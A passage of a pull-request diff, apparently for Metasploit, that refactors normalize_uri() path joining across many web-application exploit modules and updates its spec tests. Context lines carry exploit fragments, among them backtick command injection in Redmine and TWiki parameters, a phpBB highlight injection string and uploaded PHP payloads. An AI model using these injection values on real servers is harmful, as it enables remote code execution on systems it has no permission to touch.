 		# Static files
 		img_dir     = 'images/'
-		uri_base    = normalize_uri(datastore['URI'])
-		uri_base << '/' if uri_base[-1,1] != '/'
-		uri_base << 'www/'
+		uri_base    = normalize_uri(datastore['URI'], 'www/')
 
 		# Need to login first :-/
 		cookie = openx_login(uri_base)
@@ -166,7 +162,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 		res = send_request_raw(
 			{
-				'uri' => uri_base + 'admin/index.php'
+				'uri' => normalize_uri(uri_base, 'admin/index.php')
 			}, 10)
 		if not (res and res.body =~ /oa_cookiecheck\" value=\"([^\"]+)\"/)
 			return nil
@@ -176,7 +172,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		res = send_request_cgi(
 			{
 				'method'    => 'POST',
-				'uri'       => uri_base + 'admin/index.php',
+				'uri'       => normalize_uri(uri_base, 'admin/index.php'),
 				'vars_post' =>
 					{
 						'oa_cookiecheck' => cookie,
@@ -201,7 +197,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	def openx_find_campaign(uri_base, cookie)
 		res = send_request_raw(
 			{
-				'uri' => uri_base + 'admin/advertiser-campaigns.php',
+				'uri' => normalize_uri(uri_base, 'admin/advertiser-campaigns.php'),
 				'headers' =>
 					{
 						'Cookie' => "sessionID=#{cookie}; PHPSESSID=#{cookie}",
@@ -269,7 +265,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 		res = send_request_raw(
 			{
-				'uri'     => uri_base + "admin/banner-edit.php",
+				'uri'     => normalize_uri(uri_base, "admin/banner-edit.php"),
 				'method'  => 'POST',
 				'data'    => data,
 				'headers' =>
@@ -287,7 +283,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		# Ugh, now we have to get the banner id!
 		res = send_request_raw(
 			{
-				'uri'     => uri_base + "admin/campaign-banners.php?clientid=#{adv_id}&campaignid=#{camp_id}",
+				'uri'     => normalize_uri(uri_base, "admin/campaign-banners.php") + "?clientid=#{adv_id}&campaignid=#{camp_id}",
 				'method'  => 'GET',
 				'headers' =>
 					{
@@ -319,7 +315,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		# Ugh, now we have to get the banner name too!
 		res = send_request_raw(
 			{
-				'uri'     => uri_base + "admin/banner-edit.php?clientid=#{adv_id}&campaignid=#{camp_id}&bannerid=#{ban_id}",
+				'uri'     => normalize_uri(uri_base, "admin/banner-edit.php") + "?clientid=#{adv_id}&campaignid=#{camp_id}&bannerid=#{ban_id}",
 				'method'  => 'GET',
 				'headers' =>
 					{
@@ -338,7 +334,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	def openx_banner_delete(uri_base, cookie, adv_id, camp_id, ban_id)
 		res = send_request_raw(
 			{
-				'uri'     => uri_base + "admin/banner-delete.php?clientid=#{adv_id}&campaignid=#{camp_id}&bannerid=#{ban_id}",
+				'uri'     => normalize_uri(uri_base, "admin/banner-delete.php") + "?clientid=#{adv_id}&campaignid=#{camp_id}&bannerid=#{ban_id}",
 				'method'  => 'GET',
 				'headers' =>
 					{

--- a/modules/exploits/unix/webapp/oscommerce_filemanager.rb
+++ b/modules/exploits/unix/webapp/oscommerce_filemanager.rb
@@ -78,7 +78,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 		print_status("Sending file save request")
 		response = send_request_raw({
-			'uri'	  => normalize_uri(datastore['URI']) + "/" + "admin/file_manager.php/login.php?action=save",
+			'uri'	  => normalize_uri(datastore['URI'], "admin/file_manager.php/login.php") + "?action=save",
 			'method'  => 'POST',
 			'data'    => data,
 			'headers' =>
@@ -101,7 +101,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		response = send_request_raw({
 			# Allow findsock payloads to work
 			'global' => true,
-			'uri' => normalize_uri(datastore['URI']) + "/" + File.basename(filename)
+			'uri' => normalize_uri(datastore['URI'], File.basename(filename))
 		}, timeout)
 
 		handler

--- a/modules/exploits/unix/webapp/php_wordpress_foxypress.rb
+++ b/modules/exploits/unix/webapp/php_wordpress_foxypress.rb
@@ -54,12 +54,11 @@ class Metasploit3 < Msf::Exploit::Remote
 	end
 
 	def check
-		uri = normalize_uri(target_uri.path)
-		uri << '/' if uri[-1,1] != '/'
+		uri = target_uri.path
 
 		res = send_request_cgi({
 			'method' => 'GET',
-			'uri'    => "#{uri}wp-content/plugins/foxypress/uploadify/uploadify.php"
+			'uri'    => normalize_uri(uri, "wp-content/plugins/foxypress/uploadify/uploadify.php")
 		})
 
 		if res and res.code == 200
@@ -83,7 +82,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 		res = send_request_cgi({
 			'method' => 'POST',
-			'uri'    => "#{uri}wp-content/plugins/foxypress/uploadify/uploadify.php",
+			'uri'    => normalize_uri(uri, "wp-content/plugins/foxypress/uploadify/uploadify.php"),
 			'ctype'  => 'multipart/form-data; boundary=' + post_data.bound,
 			'data'   => post_data.to_s
 		})
@@ -96,7 +95,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		print_good("#{peer} - Our payload is at: #{$1}.php! Calling payload...")
 		res = send_request_cgi({
 			'method' => 'GET',
-			'uri'    => "#{uri}wp-content/affiliate_images/#{$1}.php"
+			'uri'    => normalize_uri(uri, "wp-content/affiliate_images", "#{$1}.php")
 		})
 
 		if res and res.code != 200

--- a/modules/exploits/unix/webapp/phpbb_highlight.rb
+++ b/modules/exploits/unix/webapp/phpbb_highlight.rb
@@ -70,7 +70,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		1.upto(32) do |x|
 
 		res = send_request_raw({
-				'uri'	=> normalize_uri(datastore['URI']) + '/viewtopic.php?topic=' + x.to_s,
+				'uri'	=> normalize_uri(datastore['URI'], '/viewtopic.php') + '?topic=' + x.to_s,
 			}, 25)
 
 		if (res and res.body.match(/class="postdetails"/))
@@ -92,14 +92,14 @@ class Metasploit3 < Msf::Exploit::Remote
 			return
 		else
 
-			sploit = normalize_uri(datastore['URI']) + "/viewtopic.php?t=#{topic}&highlight="
+			sploit = normalize_uri(datastore['URI'], "/viewtopic.php") + "?t=#{topic}&highlight="
 
 			case target.name
 			when /Automatic/
 				req = "/viewtopic.php?t=#{topic}&highlight=%2527%252ephpinfo()%252e%2527"
 
 				res = send_request_raw({
-				'uri'	=> normalize_uri(datastore['URI']) + req
+				'uri'	=> normalize_uri(datastore['URI'], req)
 				}, 25)
 
 				print_status("Trying to determine which attack method to use...")

--- a/modules/exploits/unix/webapp/phpmyadmin_config.rb
+++ b/modules/exploits/unix/webapp/phpmyadmin_config.rb
@@ -74,7 +74,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	def exploit
 		# First, grab the session cookie and the CSRF token
 		print_status("Grabbing session cookie and CSRF token")
-		uri = normalize_uri(datastore['URI']) + "/scripts/setup.php"
+		uri = normalize_uri(datastore['URI'], "/scripts/setup.php")
 		response = send_request_raw({ 'uri' => uri})
 		if !response
 			fail_with(Exploit::Failure::NotFound, "Failed to retrieve hash, server may not be vulnerable.")
@@ -101,7 +101,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		# Now that we've got the cookie and token, send the evil
 		print_status("Sending save request")
 		response = send_request_raw({
-			'uri'	  => normalize_uri(datastore['URI']) + "/scripts/setup.php",
+			'uri'	  => normalize_uri(datastore['URI'], "/scripts/setup.php"),
 			'method'  => 'POST',
 			'data'    => data,
 			'cookie'  => cookie,
@@ -120,7 +120,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		response = send_request_raw({
 			# Allow findsock payloads to work
 			'global' => true,
-			'uri' => normalize_uri(datastore['URI']) + "/config/config.inc.php"
+			'uri' => normalize_uri(datastore['URI'], "/config/config.inc.php")
 		}, timeout)
 
 		handler

--- a/modules/exploits/unix/webapp/projectpier_upload_exec.rb
+++ b/modules/exploits/unix/webapp/projectpier_upload_exec.rb
@@ -63,7 +63,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		res = send_request_cgi(
 			{
 				'method' => 'GET',
-				'uri'    => "#{base}/index.php",
+				'uri'    => normalize_uri("#{base}/index.php"),
 				'vars_get' =>
 					{
 						'c' => 'access',

--- a/modules/exploits/unix/webapp/redmine_scm_exec.rb
+++ b/modules/exploits/unix/webapp/redmine_scm_exec.rb
@@ -55,7 +55,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def exploit
 		command = Rex::Text.uri_encode(payload.encoded)
-		urlconfigdir = normalize_uri(datastore['URI']) + "/repository/annotate?rev=`#{command}`"
+		urlconfigdir = normalize_uri(datastore['URI'], "/repository/annotate") + "?rev=`#{command}`"
 
 		res = send_request_raw({
 			'uri'     => urlconfigdir,

--- a/modules/exploits/unix/webapp/sphpblog_file_upload.rb
+++ b/modules/exploits/unix/webapp/sphpblog_file_upload.rb
@@ -57,7 +57,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def check
 		res = send_request_raw({
-			'uri'     => normalize_uri(datastore['URI']) + '/index.php'
+			'uri'     => normalize_uri(datastore['URI'], '/index.php')
 		}, 25)
 
 		if (res and res.body =~ /Simple PHP Blog (\d)\.(\d)\.(\d)/)
@@ -79,7 +79,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	def retrieve_password_hash(file)
 
 		res = send_request_raw({
-			'uri'    => normalize_uri(datastore['URI']) + file,
+			'uri'    => normalize_uri(datastore['URI'], file)
 		}, 25)
 
 		if (res and res.message == "OK" and res.body)
@@ -94,7 +94,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	def create_new_password(user, pass)
 
 		res = send_request_cgi({
-			'uri'     => normalize_uri(datastore['URI']) + '/install03_cgi.php',
+			'uri'     => normalize_uri(datastore['URI'], '/install03_cgi.php'),
 			'method'  => 'POST',
 			'data'    => "user=#{user}&pass=#{pass}",
 		}, 25)
@@ -109,7 +109,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	def retrieve_session(user, pass)
 
 		res = send_request_cgi({
-			'uri'     => normalize_uri(datastore['URI']) + "/login_cgi.php",
+			'uri'     => normalize_uri(datastore['URI'], "/login_cgi.php"),
 			'method'  => 'POST',
 			'data'    => "user=#{user}&pass=#{pass}",
 		}, 25)
@@ -139,7 +139,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		data << "\r\n--#{boundary}--"
 
 		res = send_request_raw({
-			'uri'	  => normalize_uri(datastore['URI']) + "/upload_img_cgi.php",
+			'uri'	  => normalize_uri(datastore['URI'], "/upload_img_cgi.php"),
 			'method'  => 'POST',
 			'data'    => data,
 			'headers' =>
@@ -160,7 +160,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	def reset_original_password(hash, scriptlocation)
 
 		res = send_request_cgi({
-			'uri'	 => normalize_uri(datastore['URI']) + scriptlocation,
+			'uri'	 => normalize_uri(datastore['URI'], scriptlocation),
 			'method' => 'POST',
 			'data'	 => "hash=" + hash,
 		}, 25)
@@ -177,7 +177,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		delete_path = "/comment_delete_cgi.php?y=05&m=08&comment=.#{file}"
 
 		res = send_request_raw({
-			'uri'	=> normalize_uri(datastore['URI']) + delete_path,
+			'uri'	=> normalize_uri(datastore['URI'], delete_path),
 		}, 25)
 
 		if (res)

--- a/modules/exploits/unix/webapp/sugarcrm_unserialize_exec.rb
+++ b/modules/exploits/unix/webapp/sugarcrm_unserialize_exec.rb
@@ -75,7 +75,6 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def exploit
 		base = normalize_uri(target_uri.path)
-		base << '/' if base[-1, 1] != '/'
 
 		@peer = "#{rhost}:#{rport}"
 		username = datastore['USERNAME']
@@ -89,7 +88,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 		res = send_request_cgi(
 		{
-			'uri'    => "#{base}index.php" ,
+			'uri'    => normalize_uri(base, "index.php") ,
 			'method' => "POST",
 			'headers'   =>
 				{

--- a/modules/exploits/unix/webapp/tikiwiki_graph_formula_exec.rb
+++ b/modules/exploits/unix/webapp/tikiwiki_graph_formula_exec.rb
@@ -58,7 +58,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	def check
 		res = send_request_raw(
 			{
-				'uri'     => normalize_uri(datastore['URI']) + "/tiki-index.php",
+				'uri'     => normalize_uri(datastore['URI'], "/tiki-index.php"),
 				'method'  => 'GET',
 				'headers' =>
 					{
@@ -155,8 +155,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	# when exploiting this vulnerability :)
 	#
 	def build_uri(f_val)
-		uri = normalize_uri(datastore['URI'])
-		uri << "/tiki-graph_formula.php?"
+		uri = normalize_uri(datastore['URI'], "/tiki-graph_formula.php?")
 
 		# Requirements:
 		query = ''

--- a/modules/exploits/unix/webapp/tikiwiki_jhot_exec.rb
+++ b/modules/exploits/unix/webapp/tikiwiki_jhot_exec.rb
@@ -59,7 +59,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	def check
 		res = send_request_raw(
 			{
-				'uri'     => normalize_uri(datastore['URI']) + "/tiki-index.php",
+				'uri'     => normalize_uri(datastore['URI'], "/tiki-index.php"),
 				'method'  => 'GET'
 			}, 25)
 
@@ -82,7 +82,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	end
 
 	def create_temp_file
-		url_jhot = normalize_uri(datastore['URI']) + "/jhot.php"
+		url_jhot = normalize_uri(datastore['URI'], "/jhot.php")
 
 		scode =
 			"\x0d\x0a\x3c\x3f\x70\x68\x70\x0d\x0a\x2f\x2f\x20\x24\x48\x65\x61" +
@@ -153,7 +153,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	end
 
 	def exe_command(cmd)
-		url_config = normalize_uri(datastore['URI']) + "/img/wiki/tiki-config.php"
+		url_config = normalize_uri(datastore['URI'], "/img/wiki/tiki-config.php")
 
 		res = send_request_raw({
 			'uri'     => url_config,
@@ -182,7 +182,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	end
 
 	def remove_temp_file
-		url_config = normalize_uri(datastore['URI']) + "/img/wiki/tiki-config.php"
+		url_config = normalize_uri(datastore['URI'], "/img/wiki/tiki-config.php")
 
 		res = send_request_raw({
 			'uri'     => url_config,

--- a/modules/exploits/unix/webapp/tikiwiki_unserialize_exec.rb
+++ b/modules/exploits/unix/webapp/tikiwiki_unserialize_exec.rb
@@ -78,7 +78,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	end
 
 	def exploit
-		base = normalize_uri(target_uri.path)
+		base = target_uri.path
 		base << '/' if base[-1, 1] != '/'
 		@upload_php = rand_text_alpha(rand(4) + 4) + ".php"
 		@peer = "#{rhost}:#{rport}"
@@ -86,7 +86,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		print_status("#{@peer} - Disclosing the path of the Tiki Wiki on the filesystem")
 
 		res = send_request_cgi(
-			'uri' => "#{base}tiki-rss_error.php"
+			'uri' => normalize_uri(base, "tiki-rss_error.php")
 		)
 
 		if not res or res.code != 200 or not res.body =~ /[> ](\/.*)tiki-rss_error\.php/
@@ -112,7 +112,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 		res = send_request_cgi(
 		{
-			'uri' => "#{base}tiki-print_multi_pages.php",
+			'uri' => normalize_uri(base, "tiki-print_multi_pages.php"),
 			'method' => 'POST',
 			'vars_post' => {
 				'printpages' => printpages
@@ -129,7 +129,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		res = send_request_cgi(
 		{
 			'method' => 'GET',
-			'uri'    => "#{base + @upload_php}",
+			'uri'    => normalize_uri(base, @upload_php),
 			'headers' => {
 				'Cmd' => Rex::Text.encode_base64(payload.encoded)
 			}

--- a/modules/exploits/unix/webapp/twiki_history.rb
+++ b/modules/exploits/unix/webapp/twiki_history.rb
@@ -61,8 +61,8 @@ class Metasploit3 < Msf::Exploit::Remote
 	#
 	def check
 		test_file = rand_text_alphanumeric(8+rand(8))
-		cmd_base = normalize_uri(datastore['URI']) + '/view/Main/TWikiUsers?rev='
-		test_url = normalize_uri(datastore['URI']) + '/' + test_file
+		cmd_base = normalize_uri(datastore['URI'], '/view/Main/TWikiUsers?rev=')
+		test_url = normalize_uri(datastore['URI'], test_file)
 
 		# first see if it already exists (it really shouldn't)
 		res = send_request_raw({
@@ -109,7 +109,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 		rev = rand_text_numeric(1+rand(5))
 		rev << ' `' + payload.encoded + '`#'
-		query_str = normalize_uri(datastore['URI']) + '/view/Main/TWikiUsers'
+		query_str = normalize_uri(datastore['URI'], '/view/Main/TWikiUsers')
 		query_str << '?rev='
 		query_str << Rex::Text.uri_encode(rev)
 

--- a/modules/exploits/unix/webapp/twiki_search.rb
+++ b/modules/exploits/unix/webapp/twiki_search.rb
@@ -56,8 +56,8 @@ class Metasploit3 < Msf::Exploit::Remote
 	def check
 		content = rand_text_alphanumeric(16+rand(16))
 		test_file = rand_text_alphanumeric(8+rand(8))
-		cmd_base = normalize_uri(datastore['URI']) + '/view/Main/WebSearch?search='
-		test_url = normalize_uri(datastore['URI']) + '/view/Main/' + test_file
+		cmd_base = normalize_uri(datastore['URI'], '/view/Main/WebSearch?search=')
+		test_url = normalize_uri(datastore['URI'], '/view/Main/', test_file)
 
 		# first see if it already exists (it really shouldn't)
 		res = send_request_raw({
@@ -105,13 +105,13 @@ class Metasploit3 < Msf::Exploit::Remote
 		search = rand_text_alphanumeric(1+rand(8))
 		search << "';" + payload.encoded + ";#\'"
 
-		query_str = normalize_uri(datastore['URI']) + '/view/Main/WebSearch'
+		query_str = normalize_uri(datastore['URI'], '/view/Main/WebSearch')
 		query_str << '?search='
 		query_str << Rex::Text.uri_encode(search)
 
 		res = send_request_cgi({
 				'method'    => 'GET',
-				'uri'	      => query_str,
+				'uri'       => query_str,
 			}, 25)
 
 		if (res and res.code == 200)

--- a/modules/exploits/windows/http/php_apache_request_headers_bof.rb
+++ b/modules/exploits/windows/http/php_apache_request_headers_bof.rb
@@ -103,7 +103,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}")
 
 		res = send_request_cgi({
-			'uri'          => normalize_uri(target_uri.to_s),
+			'uri'          => normalize_uri(target_uri.path),
 			'method'       => 'GET',
 			'headers'      =>
 			{

--- a/modules/exploits/windows/http/sonicwall_scrutinizer_sqli.rb
+++ b/modules/exploits/windows/http/sonicwall_scrutinizer_sqli.rb
@@ -62,7 +62,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 
 	def check
-		res = send_request_raw({'uri'=>normalize_uri(target_uri.host)})
+		res = send_request_raw({'uri'=>normalize_uri(target_uri.path)})
 		if res and res.body =~ /\<title\>Scrutinizer\<\/title\>/ and
 			res.body =~ /\<div id\=\'.+\'\>Scrutinizer 9\.[0-5]\.[0-1]\<\/div\>/
 			return Exploit::CheckCode::Vulnerable

--- a/modules/exploits/windows/http/sonicwall_scrutinizer_sqli.rb
+++ b/modules/exploits/windows/http/sonicwall_scrutinizer_sqli.rb
@@ -62,7 +62,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 
 	def check
-		res = send_request_raw({'uri'=>normalize_uri(target_uri.path)})
+		res = send_request_raw({'uri'=>normalize_uri(target_uri.host)})
 		if res and res.body =~ /\<title\>Scrutinizer\<\/title\>/ and
 			res.body =~ /\<div id\=\'.+\'\>Scrutinizer 9\.[0-5]\.[0-1]\<\/div\>/
 			return Exploit::CheckCode::Vulnerable

--- a/modules/exploits/windows/http/sonicwall_scrutinizer_sqli.rb
+++ b/modules/exploits/windows/http/sonicwall_scrutinizer_sqli.rb
@@ -62,7 +62,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 
 	def check
-		res = send_request_raw({'uri'=>normalize_uri(target_uri.path)})
+		res = send_request_raw({'uri'=>'/'}) # Check the base path for version regex
 		if res and res.body =~ /\<title\>Scrutinizer\<\/title\>/ and
 			res.body =~ /\<div id\=\'.+\'\>Scrutinizer 9\.[0-5]\.[0-1]\<\/div\>/
 			return Exploit::CheckCode::Vulnerable

--- a/modules/exploits/windows/http/sybase_easerver.rb
+++ b/modules/exploits/windows/http/sybase_easerver.rb
@@ -70,7 +70,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 		# Sending the request
 		res = send_request_cgi({
-			'uri'          => normalize_uri(datastore['DIR']) + '/Login.jsp?' + crash,
+			'uri'          => normalize_uri(datastore['DIR'], '/Login.jsp?') + crash,
 			'method'       => 'GET',
 			'headers'      => {
 				'Accept'	=> '*/*',

--- a/modules/exploits/windows/http/sysax_create_folder.rb
+++ b/modules/exploits/windows/http/sysax_create_folder.rb
@@ -126,12 +126,12 @@ class Metasploit3 < Msf::Exploit::Remote
 		pass = datastore['SysaxPASS']
 
 		creds = "fd=#{Rex::Text.encode_base64(user+"\x0a"+pass)}"
-		uri = target_uri.to_s
+		uri = target_uri.path
 		# Login to get SID value
 		r = send_request_cgi({
 			'method' => "POST",
-			'uri'	 => normalize_uri("#{uri}/scgi?sid=0&pid=dologin"),
-			'data'	 => creds
+			'uri'    => normalize_uri("#{uri}/scgi?sid=0&pid=dologin"),
+			'data'   => creds
 		})
 
 		# Parse response for SID token
@@ -146,7 +146,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 		# Find the path because it's used to help calculate the offset
 		random_folder_name = rand_text_alpha(8) # This folder should not exist in the root dir
-		uri normalize_uri(target_uri.to_s)
+		uri = normalize_uri(target_uri.path)
 		r = send_request_cgi({
 			'uri' => normalize_uri("#{uri}/scgi?sid=#{sid}&pid=transferpage2_name1_#{random_folder_name}.htm"),
 			'method' => 'POST',
@@ -182,7 +182,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		post_data = Rex::MIME::Message.new
 		post_data.add_part(buffer, nil, nil, "form-data; name=\"e2\"")
 		post_data.bound = rand_text_numeric(57) # example; "---------------------------12816808881949705206242427669"
-		uri = normalize_uri(target_uri.to_s)
+		uri = normalize_uri(target_uri.path)
 		r = send_request_cgi({
 			'uri'	  => normalize_uri("#{uri}/scgi?sid=#{sid}&pid=mk_folder2_name1.htm"),
 			'method'  => 'POST',

--- a/modules/exploits/windows/http/sysax_create_folder.rb
+++ b/modules/exploits/windows/http/sysax_create_folder.rb
@@ -126,11 +126,11 @@ class Metasploit3 < Msf::Exploit::Remote
 		pass = datastore['SysaxPASS']
 
 		creds = "fd=#{Rex::Text.encode_base64(user+"\x0a"+pass)}"
-		uri = normalize_uri(target_uri.to_s)
+		uri = target_uri.to_s
 		# Login to get SID value
 		r = send_request_cgi({
 			'method' => "POST",
-			'uri'	 => "#{uri}/scgi?sid=0&pid=dologin",
+			'uri'	 => normalize_uri("#{uri}/scgi?sid=0&pid=dologin"),
 			'data'	 => creds
 		})
 
@@ -148,7 +148,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		random_folder_name = rand_text_alpha(8) # This folder should not exist in the root dir
 		uri normalize_uri(target_uri.to_s)
 		r = send_request_cgi({
-			'uri' => "#{uri}/scgi?sid=#{sid}&pid=transferpage2_name1_#{random_folder_name}.htm",
+			'uri' => normalize_uri("#{uri}/scgi?sid=#{sid}&pid=transferpage2_name1_#{random_folder_name}.htm"),
 			'method' => 'POST',
 		})
 
@@ -184,7 +184,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		post_data.bound = rand_text_numeric(57) # example; "---------------------------12816808881949705206242427669"
 		uri = normalize_uri(target_uri.to_s)
 		r = send_request_cgi({
-			'uri'	  => "#{uri}/scgi?sid=#{sid}&pid=mk_folder2_name1.htm",
+			'uri'	  => normalize_uri("#{uri}/scgi?sid=#{sid}&pid=mk_folder2_name1.htm"),
 			'method'  => 'POST',
 			'data'	  => post_data.to_s,
 			'ctype'	  => "multipart/form-data; boundary=#{post_data.bound}",

--- a/modules/exploits/windows/iis/ms02_065_msadc.rb
+++ b/modules/exploits/windows/iis/ms02_065_msadc.rb
@@ -85,7 +85,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		data  = 'Content-Type: ' + sploit
 
 		res = send_request_raw({
-			'uri'          => normalize_uri(datastore['PATH']) + '/AdvancedDataFactory.Query',
+			'uri'          => normalize_uri(datastore['PATH'], '/AdvancedDataFactory.Query'),
 			'headers' =>
 				{
 					'Content-Length' => data.length,

--- a/modules/exploits/windows/iis/msadc.rb
+++ b/modules/exploits/windows/iis/msadc.rb
@@ -128,7 +128,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		data << sploit
 
 		res = send_request_raw({
-			'uri'          => normalize_uri(datastore['PATH']) + '/' + method,
+			'uri'          => normalize_uri(datastore['PATH'], method),
 			'agent' => 'ACTIVEDATA',
 			'headers' =>
 				{
@@ -200,7 +200,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			data << "\r\n\r\n--#{boundary}--\r\n"
 
 			res = send_request_raw({
-			'uri'     => normalize_uri(datastore['PATH']) + '/VbBusObj.VbBusObjCls.GetMachineName',
+			'uri'     => normalize_uri(datastore['PATH'], '/VbBusObj.VbBusObjCls.GetMachineName'),
 			'agent'   => 'ACTIVEDATA',
 			'headers' =>
 				{

--- a/modules/exploits/windows/mysql/scrutinizer_upload_exec.rb
+++ b/modules/exploits/windows/mysql/scrutinizer_upload_exec.rb
@@ -72,7 +72,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def check
 		tmp_rport = datastore['RPORT']
-		uri = normalize_uri(target_uri.host)
+		uri = normalize_uri(target_uri.path)
 		uri << '/' if uri[-1,1] != '/'
 		datastore['RPORT'] = datastore['HTTPPORT']
 		res = send_request_raw({'uri'=>uri})

--- a/modules/exploits/windows/mysql/scrutinizer_upload_exec.rb
+++ b/modules/exploits/windows/mysql/scrutinizer_upload_exec.rb
@@ -72,10 +72,8 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def check
 		tmp_rport = datastore['RPORT']
-		uri = normalize_uri(target_uri.path)
-		uri << '/' if uri[-1,1] != '/'
 		datastore['RPORT'] = datastore['HTTPPORT']
-		res = send_request_raw({'uri'=>uri})
+		res = send_request_raw({'uri'=>'/'})  #Check the base path for regex
 		datastore['RPORT'] = tmp_rport
 		if res and res.body =~ /\<title\>Scrutinizer\<\/title\>/ and
 			res.body =~ /\<div id\=\'.+\'\>Scrutinizer 9\.[0-5]\.[0-2]\<\/div\>/

--- a/spec/lib/msf/core/exploit/http/client_spec.rb
+++ b/spec/lib/msf/core/exploit/http/client_spec.rb
@@ -56,8 +56,8 @@ describe Msf::Exploit::Remote::HttpClient do
 					unnormalized_uri[-1, 1].should == '/'
 				end
 
-				it "should remove the trailing '/'" do
-					normalized_uri.should == expected_normalized_uri
+				it "should end with '/'" do
+					normalized_uri[-1, 1].should == '/'
 				end
 
 				context "with just '/'" do
@@ -76,11 +76,11 @@ describe Msf::Exploit::Remote::HttpClient do
 
 				context "with multiple multiple trailing '/'" do
 					let(:unnormalized_uri) do
-						"#{expected_normalized_uri}//"
+						"#{expected_normalized_uri}"
 					end
 
-					it "should have multiple trailing '/'" do
-						unnormalized_uri[-2 .. -1].should == '//'
+					it "should have single trailing '/'" do
+						unnormalized_uri[-2,1].should == '/'
 					end
 
 					it "should return only one trailing '/'" do
@@ -122,12 +122,12 @@ describe Msf::Exploit::Remote::HttpClient do
 					normalized_uri[0, 1].should == '/'
 				end
 
-				it "'should remove trailing '/'" do
-					normalized_uri[-1, 1].should_not == '/'
+				it "'should not remove trailing '/'" do
+					normalized_uri[-1, 1].should == '/'
 				end
 
 				it 'should normalize the uri' do
-					normalized_uri.should == expected_normalized_uri
+					normalized_uri.should == "#{expected_normalized_uri}/"
 				end
 			end
 


### PR DESCRIPTION
Related to [SeeRM #7733]:
http://dev.metasploit.com/redmine/issues/7733

This pull request focuses on two main things:  Changing the normalize_uri() function, and modules that use it.

normalize_uri() Function:

Long story short, our current normalize_uri() will remove the trailing slash when sometimes it shouldn't be doing that.  This is because "/abc/" can give you a 200 (index page or directory), while a "/abc" can give you a 301.  So this update gets rid of that code.

The new normalize_uri() also supports a new writing style that's similar to File.join().  For example, now you can do this:

```
normalize_uri("test", "test.html")  # Returns "/test/test.html"
normalize_uri("test/", "test/")     # Returns "/test/test/"
normalize_uri("test//", "test")     # Returns "/test/test"
```

This way, the module no longer has to worry about if there's an extra "/", or a missing "/".  You can just join the paths together like the above writing style, and normalize_uri() will take care of the rest.

Modules:

For best results, modules should run normalize_uri() before a send_request_\* call.  If you do a normalize_uri() first, but then you concatenate more paths, the URI is no longer normalized -- and if that's the case, you may get the double-slash bug again.  Some modules didn't implement it correctly, so I had to go back and check them all.
